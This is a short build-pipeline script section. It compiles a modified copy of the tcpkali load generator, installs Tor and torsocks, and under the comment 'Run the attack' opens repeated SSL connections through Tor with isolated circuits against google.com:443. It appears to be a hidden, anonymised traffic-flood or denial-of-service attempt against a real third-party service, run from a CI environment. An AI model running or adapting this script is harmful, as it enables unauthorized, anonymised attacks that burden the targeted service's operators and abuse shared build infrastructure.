script:
  # Install modified tcpkali
  - cd tcpkali_modified
  - autoreconf -iv > log.txt && ./configure > log.txt
  - sudo make --jobs=4 --silent > log.txt
  - sudo make install --silent > log.txt

  # Setup tor, torsocks
  - sudo apt-get install tor > log.txt
  - sudo service tor start > log.txt
  - sudo apt-get install torsocks > log.txt

  # Run the attack
  - sudo torsocks --isolate tcpkali --connections=10 --ssl --duration=30s --message="   " --message-rate=5 google.com:443
